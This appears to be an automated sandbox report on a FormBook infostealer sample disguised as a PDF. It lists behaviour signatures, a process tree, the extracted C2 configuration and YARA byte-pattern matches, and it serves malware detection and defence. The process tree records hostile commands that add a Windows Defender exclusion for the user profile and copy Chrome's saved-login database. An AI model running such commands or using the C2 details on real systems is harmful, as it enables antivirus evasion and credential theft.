Edit tour

Windows Analysis Report
101 2043 5770 pdf.exe

Overview

General Information

Sample name:	101 2043 5770 pdf.exe
Analysis ID:	1501602
MD5:	5e8e7dd95b3e592a44a3c61b7f8d91f8
SHA1:	d829b9e1e99087d94f527f359184f65b608190c5
SHA256:	8d278608d1d1c4c5b6c048020c23351e75203066af1ae1e63c5c5ac0170cd3de
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected FormBook malware

Found malware configuration

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Steal Google chrome login data

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Reads the DNS cache

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to resolve many domain names, but no domain seems valid

Tries to steal Mail credentials (via file / registry access)

Uses ipconfig to lookup or modify the Windows network settings

Uses regedit.exe to modify the Windows registry

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Browser Data Stealing

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

101 2043 5770 pdf.exe (PID: 2720 cmdline: "C:\Users\user\Desktop\101 2043 5770 pdf.exe" MD5: 5E8E7DD95B3E592A44A3C61B7F8D91F8)

conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1292 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wmplayer.exe (PID: 7076 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)

csc.exe (PID: 6324 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

ipconfig.exe (PID: 6968 cmdline: "C:\Windows\SysWOW64\ipconfig.exe" MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)

cmd.exe (PID: 5824 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 5612 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

101 2043 5770 pdf.exe (PID: 6512 cmdline: "C:\Users\user\101 2043 5770 pdf.exe" MD5: 5E8E7DD95B3E592A44A3C61B7F8D91F8)

conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6956 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

calc.exe (PID: 2300 cmdline: "C:\Windows\System32\calc.exe" MD5: 5DA8C98136D98DFEC4716EDD79C7145F)

regedit.exe (PID: 3552 cmdline: "C:\Windows\regedit.exe" MD5: 999A30979F6195BF562068639FFC4426)

cmd.exe (PID: 1464 cmdline: "C:\Windows\System32\cmd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

svchost.exe (PID: 6272 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

iexplore.exe (PID: 6108 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)

cmmon32.exe (PID: 5376 cmdline: "C:\Windows\SysWOW64\cmmon32.exe" MD5: DEC326E5B4D23503EA5176878DDDB683)

101 2043 5770 pdf.exe (PID: 7096 cmdline: "C:\Users\user\101 2043 5770 pdf.exe" MD5: 5E8E7DD95B3E592A44A3C61B7F8D91F8)

conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6808 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

csc.exe (PID: 5868 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

wmplayer.exe (PID: 6672 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)

raserver.exe (PID: 1088 cmdline: "C:\Windows\SysWOW64\raserver.exe" MD5: D1053D114847677185F248FF98C3F255)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.a2zglobalimports.com/kmge/"], "decoy": ["jia0752d.com", "cq0jt.sbs", "whimsicalweddingrentals.com", "meetsex-here.life", "hhe-crv220.com", "bedbillionaire.com", "soycmo.com", "mrawkward.xyz", "11ramshornroad.com", "motoyonaturals.com", "thischicloves.com", "gacorbet.pro", "ihsanid.com", "pancaketurner.com", "santanarstore.com", "cr3dtv.com", "negotools.com", "landfillequip.com", "sejasuapropriachefe.com", "diamant-verkopen.store", "builtonmybrother.art", "teoti.beauty", "kickssoccercamp.com", "chickfrau.com", "compare-energy.com", "icvp5o.xyz", "susan-writes.com", "dropletcoin.com", "sivertool.com", "sup-25987659.com", "weedz-seeds.today", "agritamaperkasaindonesia.com", "safwankhalil.com", "jm2s8a3mz.com", "wfjwjm.com", "be-heatpumps.life", "hcwoodpanel.com", "n5l780.com", "mandalah.art", "szexvideokingyen.sbs", "justinroemmick.com", "thecoolkidsdontfitin.com", "gsolartech.com", "swisswearables.com", "chicagocarpetcleaneril.com", "terrazahills-cbre.com", "santatainha.com", "sacksmantenimiento.store", "wzhem.rest", "shearwaterpembrokeshire.com", "baansantiburi.com", "mid-size-suv-87652.com", "solunchina.com", "nandos.moe", "blucretebistro.com", "identificatiekvk.digital", "8772876.com", "longfangyun.com", "litblacklit.com", "mobilferrari.com", "zeeedajewelermusic.com", "allenbach.swiss", "industrialrevolution.ink", "cmgamingtrack.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.4604222907.0000000011264000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0x9e2:$a2: pass 0x9e8:$a3: email 0x9ef:$a4: login 0x9f6:$a5: signin 0xa07:$a6: persistent 0xbda:$r1: C:\Users\user\AppData\Roaming\J8AR3449\J8Alog.ini
00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x1f2b9:$a1: E9 92 9D FF FF C3 E8
00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
